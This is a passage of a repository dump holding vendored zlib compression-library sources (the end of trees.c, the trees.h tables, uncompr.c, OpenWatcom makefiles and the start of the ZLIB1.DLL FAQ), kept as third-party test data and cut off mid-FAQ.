if ((block_mask & 1) && (s->dyn_ltree[n].Freq != 0)) return Z_BINARY; /* Check for textual ("allow-listed") bytes. */ if (s->dyn_ltree[9].Freq != 0 || s->dyn_ltree[10].Freq != 0 || s->dyn_ltree[13].Freq != 0) return Z_TEXT; for (n = 32; n < LITERALS; n++) if (s->dyn_ltree[n].Freq != 0) return Z_TEXT; /* There are no "block-listed" or "allow-listed" bytes: * this stream either is empty or has tolerated ("gray-listed") bytes only. */ return Z_BINARY; } /* =========================================================================== * Determine the best encoding for the current block: dynamic trees, static * trees or store, and write out the encoded block. */ void ZLIB_INTERNAL _tr_flush_block(deflate_state *s, charf *buf, ulg stored_len, int last) { ulg opt_lenb, static_lenb; /* opt_len and static_len in bytes */ int max_blindex = 0; /* index of last bit length code of non zero freq */ /* Build the Huffman trees unless a stored block is forced */ if (s->level > 0) { /* Check if the file is binary or text */ if (s->strm->data_type == Z_UNKNOWN) s->strm->data_type = detect_data_type(s); /* Construct the literal and distance trees */ build_tree(s, (tree_desc *)(&(s->l_desc))); Tracev((stderr, "\nlit data: dyn %ld, stat %ld", s->opt_len, s->static_len)); build_tree(s, (tree_desc *)(&(s->d_desc))); Tracev((stderr, "\ndist data: dyn %ld, stat %ld", s->opt_len, s->static_len)); /* At this point, opt_len and static_len are the total bit lengths of * the compressed block data, excluding the tree representations. */ /* Build the bit length tree for the above two trees, and get the index * in bl_order of the last bit length code to send. */ max_blindex = build_bl_tree(s); /* Determine the best encoding. Compute the block lengths in bytes. */ opt_lenb = (s->opt_len + 3 + 7) >> 3; static_lenb = (s->static_len + 3 + 7) >> 3; Tracev((stderr, "\nopt %lu(%lu) stat %lu(%lu) stored %lu lit %u ", opt_lenb, s->opt_len, static_lenb, s->static_len, stored_len, s->sym_next / 3)); #ifndef FORCE_STATIC if (static_lenb <= opt_lenb || s->strategy == Z_FIXED) #endif opt_lenb = static_lenb; } else { Assert(buf != (char*)0, "lost buf"); opt_lenb = static_lenb = stored_len + 5; /* force a stored block */ } #ifdef FORCE_STORED if (buf != (char*)0) { /* force stored block */ #else if (stored_len + 4 <= opt_lenb && buf != (char*)0) { /* 4: two words for the lengths */ #endif /* The test buf != NULL is only necessary if LIT_BUFSIZE > WSIZE. * Otherwise we can't have processed more than WSIZE input bytes since * the last block flush, because compression would have been * successful. If LIT_BUFSIZE <= WSIZE, it is never too late to * transform a block into a stored block. */ _tr_stored_block(s, buf, stored_len, last); } else if (static_lenb == opt_lenb) { send_bits(s, (STATIC_TREES<<1) + last, 3); compress_block(s, (const ct_data *)static_ltree, (const ct_data *)static_dtree); #ifdef ZLIB_DEBUG s->compressed_len += 3 + s->static_len; #endif } else { send_bits(s, (DYN_TREES<<1) + last, 3); send_all_trees(s, s->l_desc.max_code + 1, s->d_desc.max_code + 1, max_blindex + 1); compress_block(s, (const ct_data *)s->dyn_ltree, (const ct_data *)s->dyn_dtree); #ifdef ZLIB_DEBUG s->compressed_len += 3 + s->opt_len; #endif } Assert (s->compressed_len == s->bits_sent, "bad compressed size"); /* The above check is made mod 2^32, for files larger than 512 MB * and uLong implemented on 32 bits. */ init_block(s); if (last) { bi_windup(s); #ifdef ZLIB_DEBUG s->compressed_len += 7; /* align on byte boundary */ #endif } Tracev((stderr,"\ncomprlen %lu(%lu) ", s->compressed_len >> 3, s->compressed_len - 7*last)); } /* =========================================================================== * Save the match info and tally the frequency counts. Return true if * the current block must be flushed. */ int ZLIB_INTERNAL _tr_tally(deflate_state *s, unsigned dist, unsigned lc) { s->sym_buf[s->sym_next++] = (uch)dist; s->sym_buf[s->sym_next++] = (uch)(dist >> 8); s->sym_buf[s->sym_next++] = (uch)lc; if (dist == 0) { /* lc is the unmatched char */ s->dyn_ltree[lc].Freq++; } else { s->matches++; /* Here, lc is the match length - MIN_MATCH */ dist--; /* dist = match distance - 1 */ Assert((ush)dist < (ush)MAX_DIST(s) && (ush)lc <= (ush)(MAX_MATCH-MIN_MATCH) && (ush)d_code(dist) < (ush)D_CODES, "_tr_tally: bad match"); s->dyn_ltree[_length_code[lc] + LITERALS + 1].Freq++; s->dyn_dtree[d_code(dist)].Freq++; } return (s->sym_next == s->sym_end); } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/trees.h ================================================ /* header created automatically with -DGEN_TREES_H */ local const ct_data static_ltree[L_CODES+2] = { {{ 12},{ 8}}, {{140},{ 8}}, {{ 76},{ 8}}, {{204},{ 8}}, {{ 44},{ 8}}, {{172},{ 8}}, {{108},{ 8}}, {{236},{ 8}}, {{ 28},{ 8}}, {{156},{ 8}}, {{ 92},{ 8}}, {{220},{ 8}}, {{ 60},{ 8}}, {{188},{ 8}}, {{124},{ 8}}, {{252},{ 8}}, {{ 2},{ 8}}, {{130},{ 8}}, {{ 66},{ 8}}, {{194},{ 8}}, {{ 34},{ 8}}, {{162},{ 8}}, {{ 98},{ 8}}, {{226},{ 8}}, {{ 18},{ 8}}, {{146},{ 8}}, {{ 82},{ 8}}, {{210},{ 8}}, {{ 50},{ 8}}, {{178},{ 8}}, {{114},{ 8}}, {{242},{ 8}}, {{ 10},{ 8}}, {{138},{ 8}}, {{ 74},{ 8}}, {{202},{ 8}}, {{ 42},{ 8}}, {{170},{ 8}}, {{106},{ 8}}, {{234},{ 8}}, {{ 26},{ 8}}, {{154},{ 8}}, {{ 90},{ 8}}, {{218},{ 8}}, {{ 58},{ 8}}, {{186},{ 8}}, {{122},{ 8}}, {{250},{ 8}}, {{ 6},{ 8}}, {{134},{ 8}}, {{ 70},{ 8}}, {{198},{ 8}}, {{ 38},{ 8}}, {{166},{ 8}}, {{102},{ 8}}, {{230},{ 8}}, {{ 22},{ 8}}, {{150},{ 8}}, {{ 86},{ 8}}, {{214},{ 8}}, {{ 54},{ 8}}, {{182},{ 8}}, {{118},{ 8}}, {{246},{ 8}}, {{ 14},{ 8}}, {{142},{ 8}}, {{ 78},{ 8}}, {{206},{ 8}}, {{ 46},{ 8}}, {{174},{ 8}}, {{110},{ 8}}, {{238},{ 8}}, {{ 30},{ 8}}, {{158},{ 8}}, {{ 94},{ 8}}, {{222},{ 8}}, {{ 62},{ 8}}, {{190},{ 8}}, {{126},{ 8}}, {{254},{ 8}}, {{ 1},{ 8}}, {{129},{ 8}}, {{ 65},{ 8}}, {{193},{ 8}}, {{ 33},{ 8}}, {{161},{ 8}}, {{ 97},{ 8}}, {{225},{ 8}}, {{ 17},{ 8}}, {{145},{ 8}}, {{ 81},{ 8}}, {{209},{ 8}}, {{ 49},{ 8}}, {{177},{ 8}}, {{113},{ 8}}, {{241},{ 8}}, {{ 9},{ 8}}, {{137},{ 8}}, {{ 73},{ 8}}, {{201},{ 8}}, {{ 41},{ 8}}, {{169},{ 8}}, {{105},{ 8}}, {{233},{ 8}}, {{ 25},{ 8}}, {{153},{ 8}}, {{ 89},{ 8}}, {{217},{ 8}}, {{ 57},{ 8}}, {{185},{ 8}}, {{121},{ 8}}, {{249},{ 8}}, {{ 5},{ 8}}, {{133},{ 8}}, {{ 69},{ 8}}, {{197},{ 8}}, {{ 37},{ 8}}, {{165},{ 8}}, {{101},{ 8}}, {{229},{ 8}}, {{ 21},{ 8}}, {{149},{ 8}}, {{ 85},{ 8}}, {{213},{ 8}}, {{ 53},{ 8}}, {{181},{ 8}}, {{117},{ 8}}, {{245},{ 8}}, {{ 13},{ 8}}, {{141},{ 8}}, {{ 77},{ 8}}, {{205},{ 8}}, {{ 45},{ 8}}, {{173},{ 8}}, {{109},{ 8}}, {{237},{ 8}}, {{ 29},{ 8}}, {{157},{ 8}}, {{ 93},{ 8}}, {{221},{ 8}}, {{ 61},{ 8}}, {{189},{ 8}}, {{125},{ 8}}, {{253},{ 8}}, {{ 19},{ 9}}, {{275},{ 9}}, {{147},{ 9}}, {{403},{ 9}}, {{ 83},{ 9}}, {{339},{ 9}}, {{211},{ 9}}, {{467},{ 9}}, {{ 51},{ 9}}, {{307},{ 9}}, {{179},{ 9}}, {{435},{ 9}}, {{115},{ 9}}, {{371},{ 9}}, {{243},{ 9}}, {{499},{ 9}}, {{ 11},{ 9}}, {{267},{ 9}}, {{139},{ 9}}, {{395},{ 9}}, {{ 75},{ 9}}, {{331},{ 9}}, {{203},{ 9}}, {{459},{ 9}}, {{ 43},{ 9}}, {{299},{ 9}}, {{171},{ 9}}, {{427},{ 9}}, {{107},{ 9}}, {{363},{ 9}}, {{235},{ 9}}, {{491},{ 9}}, {{ 27},{ 9}}, {{283},{ 9}}, {{155},{ 9}}, {{411},{ 9}}, {{ 91},{ 9}}, {{347},{ 9}}, {{219},{ 9}}, {{475},{ 9}}, {{ 59},{ 9}}, {{315},{ 9}}, {{187},{ 9}}, {{443},{ 9}}, {{123},{ 9}}, {{379},{ 9}}, {{251},{ 9}}, {{507},{ 9}}, {{ 7},{ 9}}, {{263},{ 9}}, {{135},{ 9}}, {{391},{ 9}}, {{ 71},{ 9}}, {{327},{ 9}}, {{199},{ 9}}, {{455},{ 9}}, {{ 39},{ 9}}, {{295},{ 9}}, {{167},{ 9}}, {{423},{ 9}}, {{103},{ 9}}, {{359},{ 9}}, {{231},{ 9}}, {{487},{ 9}}, {{ 23},{ 9}}, {{279},{ 9}}, {{151},{ 9}}, {{407},{ 9}}, {{ 87},{ 9}}, {{343},{ 9}}, {{215},{ 9}}, {{471},{ 9}}, {{ 55},{ 9}}, {{311},{ 9}}, {{183},{ 9}}, {{439},{ 9}}, {{119},{ 9}}, {{375},{ 9}}, {{247},{ 9}}, {{503},{ 9}}, {{ 15},{ 9}}, {{271},{ 9}}, {{143},{ 9}}, {{399},{ 9}}, {{ 79},{ 9}}, {{335},{ 9}}, {{207},{ 9}}, {{463},{ 9}}, {{ 47},{ 9}}, {{303},{ 9}}, {{175},{ 9}}, {{431},{ 9}}, {{111},{ 9}}, {{367},{ 9}}, {{239},{ 9}}, {{495},{ 9}}, {{ 31},{ 9}}, {{287},{ 9}}, {{159},{ 9}}, {{415},{ 9}}, {{ 95},{ 9}}, {{351},{ 9}}, {{223},{ 9}}, {{479},{ 9}}, {{ 63},{ 9}}, {{319},{ 9}}, {{191},{ 9}}, {{447},{ 9}}, {{127},{ 9}}, {{383},{ 9}}, {{255},{ 9}}, {{511},{ 9}}, {{ 0},{ 7}}, {{ 64},{ 7}}, {{ 32},{ 7}}, {{ 96},{ 7}}, {{ 16},{ 7}}, {{ 80},{ 7}}, {{ 48},{ 7}}, {{112},{ 7}}, {{ 8},{ 7}}, {{ 72},{ 7}}, {{ 40},{ 7}}, {{104},{ 7}}, {{ 24},{ 7}}, {{ 88},{ 7}}, {{ 56},{ 7}}, {{120},{ 7}}, {{ 4},{ 7}}, {{ 68},{ 7}}, {{ 36},{ 7}}, {{100},{ 7}}, {{ 20},{ 7}}, {{ 84},{ 7}}, {{ 52},{ 7}}, {{116},{ 7}}, {{ 3},{ 8}}, {{131},{ 8}}, {{ 67},{ 8}}, {{195},{ 8}}, {{ 35},{ 8}}, {{163},{ 8}}, {{ 99},{ 8}}, {{227},{ 8}} }; local const ct_data static_dtree[D_CODES] = { {{ 0},{ 5}}, {{16},{ 5}}, {{ 8},{ 5}}, {{24},{ 5}}, {{ 4},{ 5}}, {{20},{ 5}}, {{12},{ 5}}, {{28},{ 5}}, {{ 2},{ 5}}, {{18},{ 5}}, {{10},{ 5}}, {{26},{ 5}}, {{ 6},{ 5}}, {{22},{ 5}}, {{14},{ 5}}, {{30},{ 5}}, {{ 1},{ 5}}, {{17},{ 5}}, {{ 9},{ 5}}, {{25},{ 5}}, {{ 5},{ 5}}, {{21},{ 5}}, {{13},{ 5}}, {{29},{ 5}}, {{ 3},{ 5}}, {{19},{ 5}}, {{11},{ 5}}, {{27},{ 5}}, {{ 7},{ 5}}, {{23},{ 5}} }; const uch ZLIB_INTERNAL _dist_code[DIST_CODE_LEN] = { 0, 1, 2, 3, 4, 4, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 0, 0, 16, 17, 18, 18, 19, 19, 20, 20, 20, 20, 21, 21, 21, 21, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29 }; const uch ZLIB_INTERNAL _length_code[MAX_MATCH-MIN_MATCH+1]= { 0, 1, 2, 3, 4, 5, 6, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12, 12, 12, 12, 13, 13, 13, 13, 14, 14, 14, 14, 15, 15, 15, 15, 16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 18, 18, 18, 18, 18, 18, 19, 19, 19, 19, 19, 19, 19, 19, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28 }; local const int base_length[LENGTH_CODES] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 10, 12, 14, 16, 20, 24, 28, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 0 }; local const int base_dist[D_CODES] = { 0, 1, 2, 3, 4, 6, 8, 12, 16, 24, 32, 48, 64, 96, 128, 192, 256, 384, 512, 768, 1024, 1536, 2048, 3072, 4096, 6144, 8192, 12288, 16384, 24576 }; ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/uncompr.c ================================================ /* uncompr.c -- decompress a memory buffer * Copyright (C) 1995-2003, 2010, 2014, 2016 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #define ZLIB_INTERNAL #include "zlib.h" /* =========================================================================== Decompresses the source buffer into the destination buffer. *sourceLen is the byte length of the source buffer. Upon entry, *destLen is the total size of the destination buffer, which must be large enough to hold the entire uncompressed data. (The size of the uncompressed data must have been saved previously by the compressor and transmitted to the decompressor by some mechanism outside the scope of this compression library.) Upon exit, *destLen is the size of the decompressed data and *sourceLen is the number of source bytes consumed. Upon return, source + *sourceLen points to the first unused input byte. uncompress returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR if there was not enough room in the output buffer, or Z_DATA_ERROR if the input data was corrupted, including if the input data is an incomplete zlib stream. */ int ZEXPORT uncompress2(Bytef *dest, uLongf *destLen, const Bytef *source, uLong *sourceLen) { z_stream stream; int err; const uInt max = (uInt)-1; uLong len, left; Byte buf[1]; /* for detection of incomplete stream when *destLen == 0 */ len = *sourceLen; if (*destLen) { left = *destLen; *destLen = 0; } else { left = 1; dest = buf; } stream.next_in = (z_const Bytef *)source; stream.avail_in = 0; stream.zalloc = (alloc_func)0; stream.zfree = (free_func)0; stream.opaque = (voidpf)0; err = inflateInit(&stream); if (err != Z_OK) return err; stream.next_out = dest; stream.avail_out = 0; do { if (stream.avail_out == 0) { stream.avail_out = left > (uLong)max ? max : (uInt)left; left -= stream.avail_out; } if (stream.avail_in == 0) { stream.avail_in = len > (uLong)max ? max : (uInt)len; len -= stream.avail_in; } err = inflate(&stream, Z_NO_FLUSH); } while (err == Z_OK); *sourceLen -= len + stream.avail_in; if (dest != buf) *destLen = stream.total_out; else if (stream.total_out && err == Z_BUF_ERROR) left = 1; inflateEnd(&stream); return err == Z_STREAM_END ? Z_OK : err == Z_NEED_DICT ? Z_DATA_ERROR : err == Z_BUF_ERROR && left + stream.avail_out ? Z_DATA_ERROR : err; } int ZEXPORT uncompress(Bytef *dest, uLongf *destLen, const Bytef *source, uLong sourceLen) { return uncompress2(dest, destLen, source, &sourceLen); } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/watcom/watcom_f.mak ================================================ # Makefile for zlib # OpenWatcom flat model # Last updated: 28-Dec-2005 # To use, do "wmake -f watcom_f.mak" C_SOURCE = adler32.c compress.c crc32.c deflate.c & gzclose.c gzlib.c gzread.c gzwrite.c & infback.c inffast.c inflate.c inftrees.c & trees.c uncompr.c zutil.c OBJS = adler32.obj compress.obj crc32.obj deflate.obj & gzclose.obj gzlib.obj gzread.obj gzwrite.obj & infback.obj inffast.obj inflate.obj inftrees.obj & trees.obj uncompr.obj zutil.obj CC = wcc386 LINKER = wcl386 CFLAGS = -zq -mf -3r -fp3 -s -bt=dos -oilrtfm -fr=nul -wx ZLIB_LIB = zlib_f.lib .C.OBJ: $(CC) $(CFLAGS) $[@ all: $(ZLIB_LIB) example.exe minigzip.exe $(ZLIB_LIB): $(OBJS) wlib -b -c $(ZLIB_LIB) -+adler32.obj -+compress.obj -+crc32.obj wlib -b -c $(ZLIB_LIB) -+gzclose.obj -+gzlib.obj -+gzread.obj -+gzwrite.obj wlib -b -c $(ZLIB_LIB) -+deflate.obj -+infback.obj wlib -b -c $(ZLIB_LIB) -+inffast.obj -+inflate.obj -+inftrees.obj wlib -b -c $(ZLIB_LIB) -+trees.obj -+uncompr.obj -+zutil.obj example.exe: $(ZLIB_LIB) example.obj $(LINKER) -ldos32a -fe=example.exe example.obj $(ZLIB_LIB) minigzip.exe: $(ZLIB_LIB) minigzip.obj $(LINKER) -ldos32a -fe=minigzip.exe minigzip.obj $(ZLIB_LIB) clean: .SYMBOLIC del *.obj del $(ZLIB_LIB) @echo Cleaning done ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/watcom/watcom_l.mak ================================================ # Makefile for zlib # OpenWatcom large model # Last updated: 28-Dec-2005 # To use, do "wmake -f watcom_l.mak" C_SOURCE = adler32.c compress.c crc32.c deflate.c & gzclose.c gzlib.c gzread.c gzwrite.c & infback.c inffast.c inflate.c inftrees.c & trees.c uncompr.c zutil.c OBJS = adler32.obj compress.obj crc32.obj deflate.obj & gzclose.obj gzlib.obj gzread.obj gzwrite.obj & infback.obj inffast.obj inflate.obj inftrees.obj & trees.obj uncompr.obj zutil.obj CC = wcc LINKER = wcl CFLAGS = -zq -ml -s -bt=dos -oilrtfm -fr=nul -wx ZLIB_LIB = zlib_l.lib .C.OBJ: $(CC) $(CFLAGS) $[@ all: $(ZLIB_LIB) example.exe minigzip.exe $(ZLIB_LIB): $(OBJS) wlib -b -c $(ZLIB_LIB) -+adler32.obj -+compress.obj -+crc32.obj wlib -b -c $(ZLIB_LIB) -+gzclose.obj -+gzlib.obj -+gzread.obj -+gzwrite.obj wlib -b -c $(ZLIB_LIB) -+deflate.obj -+infback.obj wlib -b -c $(ZLIB_LIB) -+inffast.obj -+inflate.obj -+inftrees.obj wlib -b -c $(ZLIB_LIB) -+trees.obj -+uncompr.obj -+zutil.obj example.exe: $(ZLIB_LIB) example.obj $(LINKER) -fe=example.exe example.obj $(ZLIB_LIB) minigzip.exe: $(ZLIB_LIB) minigzip.obj $(LINKER) -fe=minigzip.exe minigzip.obj $(ZLIB_LIB) clean: .SYMBOLIC del *.obj del $(ZLIB_LIB) @echo Cleaning done ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/DLL_FAQ.txt ================================================ Frequently Asked Questions about ZLIB1.DLL This document describes the design, the rationale, and the usage of the official DLL build of zlib, named ZLIB1.DLL. If you have general questions about zlib, you should see the file "FAQ" found in the zlib distribution, or at the following location: http://www.gzip.org/zlib/zlib_faq.html 1. What is ZLIB1.DLL, and how can I get it? - ZLIB1.DLL is the official build of zlib as a DLL. (Please remark the character '1' in the name.) Pointers to a precompiled ZLIB1.DLL can be found in the zlib web site at: http://www.zlib.net/ Applications that link to ZLIB1.DLL can rely on the following specification: * The exported symbols are exclusively defined in the source files "zlib.h" and "zlib.def", found in an official zlib source distribution. * The symbols are exported by name, not by ordinal. * The exported names are undecorated. * The calling convention of functions is "C" (CDECL). * The ZLIB1.DLL binary is linked to MSVCRT.DLL. The archive in which ZLIB1.DLL is bundled contains compiled test programs that must run with a valid build of ZLIB1.DLL. It is recommended to download the prebuilt DLL from the zlib web site, instead of building it yourself, to avoid potential incompatibilities that could be introduced by your compiler and build settings. If you do build the DLL yourself, please make sure that it complies with all the above requirements, and it runs with the precompiled test programs, bundled with the original ZLIB1.DLL distribution. If, for any reason, you need to build an incompatible DLL, please use a different file name. 2. Why did you change the name of the DLL to ZLIB1.DLL? What happened to the old ZLIB.DLL? - The old ZLIB.DLL, built from zlib-1.1.4 or earlier, required compilation settings that were incompatible to those used by a static build. The DLL settings were supposed to be enabled by defining the macro ZLIB_DLL, before including "zlib.h". Incorrect handling of this macro was silently accepted at build time, resulting in two major problems: * ZLIB_DLL was missing from the old makefile. When building the DLL, not all people added it to the build options. In consequence, incompatible incarnations of ZLIB.DLL started to circulate around the net. * When switching from using the static library to using the DLL, applications had to define the ZLIB_DLL macro and to recompile all the sources that contained calls to zlib functions. Failure to do so resulted in creating binaries that were unable to run with the official ZLIB.DLL build. The only possible solution that we could foresee was to make a binary-incompatible change in the DLL interface, in order to remove the dependency on the ZLIB_DLL macro, and to release the new DLL under a different name. We chose the name ZLIB1.DLL, where '1' indicates the major zlib version number. We hope that we will not have to break the binary compatibility again, at least not as long as the zlib-1.x series will last. There is still a ZLIB_DLL macro, that can trigger a more efficient build and use of the DLL, but compatibility no longer dependents on it. 3. Can I build ZLIB.DLL from the new zlib sources, and replace an old ZLIB.DLL, that was built from zlib-1.1.4 or earlier? - In principle, you can do it by assigning calling convention keywords to the macros ZEXPORT and ZEXPORTVA. In practice, it depends on what you mean by "an old ZLIB.DLL", because the old DLL exists in several mutually-incompatible versions. You have to find out first what kind of calling convention is being used in your particular ZLIB.DLL build, and to use the same one in the new build. If you don't know what this is all about, you might be better off if you would just leave the old DLL intact. 4. Can I compile my application using the new zlib interface, and link it to an old ZLIB.DLL, that was built from zlib-1.1.4 or earlier? - The official answer is "no"; the real answer depends again on what kind of ZLIB.DLL you have. Even if you are lucky, this course of action is unreliable. If you rebuild your application and you intend to use a newer version of zlib (post- 1.1.4), it is strongly recommended to link it to the new ZLIB1.DLL. 5. Why are the zlib symbols exported by name, and not by ordinal? - Although exporting symbols by ordinal is a little faster, it is risky. Any single glitch in the maintenance or use of the DEF file that contains the ordinals can result in incompatible builds and frustrating crashes. Simply put, the benefits of exporting symbols by ordinal do not justify the risks. Technically, it should be possible to maintain ordinals in the DEF file, and still export the symbols by name. Ordinals exist in every DLL, and even if the dynamic linking performed at the DLL startup is searching for names, ordinals serve as hints, for a faster name lookup. However, if the DEF file contains ordinals, the Microsoft linker automatically builds an implib that will cause the executables linked to it to use those ordinals, and not the names. It is interesting to notice that the GNU linker for Win32 does not suffer from this problem. It is possible to avoid the DEF file if the exported symbols are accompanied by a "__declspec(dllexport)" attribute in the source files. You can do this in zlib by predefining the ZLIB_DLL macro. 6. I see that the ZLIB1.DLL functions use the "C" (CDECL) calling convention. Why not use the STDCALL convention? STDCALL is the standard convention in Win32, and I need it in my Visual Basic project! (For readability, we use CDECL to refer to the convention triggered by the "__cdecl" keyword, STDCALL to refer to the convention triggered by "__stdcall", and FASTCALL to refer to the convention triggered by "__fastcall".) - Most of the native Windows API functions (without varargs) use indeed the WINAPI convention (which translates to STDCALL in Win32), but the standard C functions use CDECL. If a user application is intrinsically tied to the Windows API (e.g. it calls native Windows API functions such as CreateFile()), sometimes it makes sense to decorate its own functions with WINAPI. But if ANSI C or POSIX portability is a goal (e.g. it calls standard C functions such as fopen()), it is not a sound decision to request the inclusion of , or to use non-ANSI constructs, for the sole purpose to make the user functions STDCALL-able. The functionality offered by zlib is not in the category of "Windows functionality", but is more like "C functionality". Technically, STDCALL is not bad; in fact, it is slightly faster than CDECL, and it works with variable-argument functions, just like CDECL. It is unfortunate that, in spite of using STDCALL in the Windows API, it is not the default convention used by the C compilers that run under Windows. The roots of the problem reside deep inside the unsafety of the K&R-style function prototypes, where the argument types are not specified; but that is another story for another day. The remaining fact is that CDECL is the default convention. Even if an explicit convention is hard-coded into the function prototypes inside C headers, problems may appear. The necessity to expose the convention in users' callbacks is one of these problems. The calling convention issues are also important when using zlib in other programming languages. Some of them, like Ada (GNAT) and Fortran (GNU G77), have C bindings implemented initially on Unix, and relying on the C calling convention. On the other hand, the pre- .NET versions of Microsoft Visual Basic require STDCALL, while Borland Delphi prefers, although it does not require, FASTCALL. In fairness to all possible uses of zlib outside the C programming language, we choose the default "C" convention. Anyone interested in different bindings or conventions is encouraged to maintain specialized projects. The "contrib/" directory from the zlib distribution already holds a couple of foreign bindings, such as Ada, C++, and Delphi. 7. I need a DLL for my Visual Basic project. What can I do? - Define the ZLIB_WINAPI macro before including "zlib.h", when building both the DLL and the user application (except that you don't need to define anything when using the DLL in Visual Basic). The ZLIB_WINAPI macro will switch on the WINAPI (STDCALL) convention. The name of this DLL must be different than the official ZLIB1.DLL. Gilles Vollant has contributed a build named ZLIBWAPI.DLL, with the ZLIB_WINAPI macro turned on, and with the minizip functionality built in. For more information, please read the notes inside "contrib/vstudio/readme.txt", found in the zlib distribution. 8. I need to use zlib in my Microsoft .NET project. What can I do? - Henrik Ravn has contributed a .NET wrapper around zlib. Look into contrib/dotzlib/, inside the zlib distribution. 9. If my application uses ZLIB1.DLL, should I link it to MSVCRT.DLL? Why? - It is not required, but it is recommended to link your application to MSVCRT.DLL, if it uses ZLIB1.DLL. The executables (.EXE, .DLL, etc.) that are involved in the same process and are using the C run-time library (i.e. they are calling standard C functions), must link to the same library. There are several libraries in the Win32 system: CRTDLL.DLL, MSVCRT.DLL, the static C libraries, etc. Since ZLIB1.DLL is linked to MSVCRT.DLL, the executables that depend on it should also be linked to MSVCRT.DLL. 10. Why are you saying that ZLIB1.DLL and my application should be linked to the same C run-time (CRT) library? I linked my application and my DLLs to different C libraries (e.g. my application to a static library, and my DLLs to MSVCRT.DLL), and everything works fine. - If a user library invokes only pure Win32 API (accessible via and the related headers), its DLL build will work in any context. But if this library invokes standard C API, things get more complicated. There is a single Win32 library in a Win32 system. Every function in this library resides in a single DLL module, that is safe to call from anywhere. On the other hand, there are multiple versions of the C library, and each of them has its own separate internal state. Standalone executables and user DLLs that call standard C functions must link to a C run-time (CRT) library, be it static or shared (DLL). Intermixing occurs when an executable (not necessarily standalone) and a DLL are linked to different CRTs, and both are running in the same process. Intermixing multiple CRTs is possible, 